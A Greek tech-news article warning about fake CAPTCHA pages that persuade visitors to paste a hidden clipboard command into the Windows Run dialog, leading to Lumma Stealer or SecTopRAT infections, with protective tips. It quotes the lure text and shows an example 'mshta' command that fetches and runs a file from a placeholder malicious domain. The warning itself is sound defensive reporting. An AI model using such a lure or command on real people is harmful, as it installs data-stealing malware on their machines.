Ένας νέος τύπος επιθέσεων έχει ξεκινήσει να εμφανίζεται στο διαδίκτυο και μάλιστα είναι μεταμφιεσμένο σε κάτι που όλοι θεωρούμε ασφαλές. Αυτό είναι φυσικά το CAPTCHA, που επιβεβαιώνει σε μια υπηρεσία πως η επίσκεψη γίνεται από άνθρωπο και όχι από ρομπότ (ή bot). Τώρα, σύμφωνα με την Malwarebytes, hackers έχουν ξεκινήσει να χρησιμοποιούν ψεύτικες φόρμες CAPTCHA, για να μας ξεγελάσουν ώστε να εγκαταστήσουμε malware, που θα τους δώσει πλήρη πρόσβαση του υπολογιστή μας.

Αυτές οι επιθέσεις ξεκίνησαν με στόχο άτομα που έχουν πρόσβαση στο δίκτυο εταιριών, όμως τώρα ο ίδιος τύπος επίθεσης έχει διευρυνθεί και πλέον απειλεί όλους τους χρήστες του διαδικτύου. Συνήθως, συναντάται σε ιστότοπους που κάποιος επισκέπτεται για να κατεβάσει περιεχόμενο, εφαρμογές, ταινίες και μουσική.

CAPTCHA

Είσαι σύνηθες στις υπηρεσίες που φιλοξενούν εφαρμογές και βίντεο, να ελέγχουν αν ο χρήστης είναι πραγματικά άνθρωπος και όχι κάποιο bot που κλέβει πόρους του συστήματος. Ακριβώς εκεί πατάνε οι hackers.

Με τους χρήστες να έχουν συνηθίσει αυτή τη συμπεριφορά στο διαδίκτυο, που στις περισσότερες περιπτώσεις είναι ακίνδυνη και απαραίτητη, οι hackers προσπαθούν να πατήσουν σε αυτό για να ξεγελάσουν το κοινό. Έτσι λοιπόν, τοποθετούν σε σελίδες ένα πλαίσιο ελέγχου ταυτότητας, που όμως είναι λίγο διαφορετικό. Μπορείτε να δείτε πες είναι στο παρακάτω screenshot.

Σε αυτό διαβάζουμε:

«Για να αποδείξετε καλύτερα ότι δεν είστε ρομπότ, παρακαλώ:

Πατήστε παρατεταμένα το πλήκτρο Windows + R.
Στα παράθυρα επαλήθευσης, πατήστε Ctrl + V.
Πατήστε Enter στο πληκτρολόγιό σας για να τελειώσετε.
Θα παρατηρήσετε και θα συμφωνήσετε:
“Δεν είμαι ρομπότ – Αναγνωριστικό επαλήθευσης reCAPTCHA: 8253”

Εκτελέστε τα παραπάνω βήματα για να ολοκληρώσετε την επαλήθευση.”

Οι οδηγίες φαίνονται ακίνδυνες, πόσο μάλλον όταν ο χρήστης δεν έχει ιδιαίτερη γνώση σε θέματα πληροφορικής. Όμως, αν ακολουθήσετε τα βήματα που γράφει, είναι δεδομένο πως θα την πατήσετε. Πρακτικά, ο ιστότοπος που έχει στηθεί για την απάτη, κάνει αντιγραφή μια εντολή στο clipboard. Κανονικά, ο Chrome και άλλοι browsers, δε κάνουν αντιγραφή τίποτα από script, χωρίς τη συγκατάθεση από τον χρήστη. Όμως στη συγκεκριμένη περίπτωση, ο χρήστης δίνει χωρίς να το γνωρίζει την συγκατάθεσή του, όταν τσεκάρει το πλαίσιο ελέγχου στην αρχή της διαδικασίας του CAPTCHA.

Πρακτικά, αυτό που μας λέει η προτροπή είναι:

  1. Ανοίξτε το παράθυρο διαλόγου Εκτέλεση στα Windows.
  2. Επικολλήστε το περιεχόμενο του clipboard σας σε αυτό το παράθυρο διαλόγου.
  3. Εκτελέστε την εντολή που μόλις επικολλήσατε.

Αυτό που κάνουμε Paste, γράφει √ “I am not a robot – reCAPTCHA Verification ID: 8370” ή τουλάχιστον αυτό βλέπει ο χρήστης. Όμως η εντολή συνεχίζεται και αν δεν μετακινήσει ο χρήστης τον κέρσορα για να την δει, δεν φαίνεται ποτέ. Η εντολή συνεχίζει με κάτι που μοιάζει με:

mshta https://{malicious.domain}/media.file

Το Mshta είναι μια εντολή που θα ενεργοποιήσει το νόμιμο εκτελέσιμο mshta.exe των Windows. Αλλά το mshta θα ανακτήσει το κακόβουλο αρχείο πολυμέσων από τον καθορισμένο domain και θα το εκτελέσει. Το αρχείο που θα κατέβει θα είναι μεταμφιεσμένο με το όνομα και την κατάληξη αυτού που ψάχναμε εξαρχής, όμως δε θα είναι αυτό.

Αυτό που είναι τα αρχεία στην πραγματικότητα είναι μια κωδικοποιημένη εντολή Powershell που θα εκτελείται αόρατα και θα κατεβάζει το πραγματικό payload. Για κάποιο διάστημα, το κακόβουλο λογισμικό που βλέπαμε να κατεβάζεται ήταν σχεδόν αποκλειστικά το Lumma Stealer infostealer, αλλά πρόσφατα βρήκαμε επίσης καμπάνιες που χρησιμοποιούν την ίδια μέθοδο για τη διάδοση του SecTopRAT. Και τα δύο έχουν σχεδιαστεί για να κλέβουν ευαίσθητα δεδομένα από το μηχάνημά σας.

SMS από την τροχαία στο κινητό όλων των οδηγών

Πώς να παραμείνετε ασφαλείς

Υπάρχουν μερικά πράγματα που μπορείτε να κάνετε για να προστατεύσετε τον εαυτό σας από το να πέσετε θύματα αυτών και παρόμοιων μεθόδων:

  • Μην ακολουθείτε τις οδηγίες που παρέχονται από κάποιον ιστότοπο που επισκεφτήκατε χωρίς να το σκεφτείτε καλά. Αν το CAPTCHA ζητάει να τρέξουμε κάτι στον υπολογιστή μας, τότε είναι απάτη.
  • Χρησιμοποιήστε μια καλή λύση κατά του κακόβουλου λογισμικού που αποκλείει κακόβουλους ιστότοπους και σενάρια.
  • Χρησιμοποιήστε μια επέκταση προγράμματος περιήγησης που αποκλείει κακόβουλους τομείς και απάτες.
  • Απενεργοποιήστε τη JavaScript στο πρόγραμμα περιήγησής σας πριν επισκεφτείτε άγνωστους ιστότοπους.

Η απενεργοποίηση της Javascript, μπορεί να σπάσει σελίδες που επισκέπτεστε τακτικά και οι οποίες είναι πλήρως ασφαλείς. Οπότε η καλύτερη λύση είναι να επενδύσετε μερικά ευρώ για να πάρετε κάποιο αξιόπιστο antivirus, που να παρέχει ασφάλεια. Εμείς χρησιμοποιούμε BitDefender σε συνδυασμό με το Malwarebytes στη δωρεάν έκδοση, με το οποίο κάνουμε τακτικά scans.

Ακολουθήστε το Techmaniacs.gr στο Google News για να διαβάζετε πρώτοι όλα τα τεχνολογικά νέα. Ένας ακόμα τρόπος να μαθαίνετε τα πάντα πρώτοι είναι να προσθέσετε το Techmaniacs.gr στον RSS feeder σας χρησιμοποιώντας τον σύνδεσμο: https://techmaniacs.gr/feed/.

ΣΧΕΤΙΚΑ ΑΡΘΡΑΠΕΡΙΣΣΟΤΕΡΑ ΑΠΟ ΤΟΝ ΙΔΙΟ ΣΥΝΤΑΚΤΗ

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here

This site uses Akismet to reduce spam. Learn how your comment data is processed.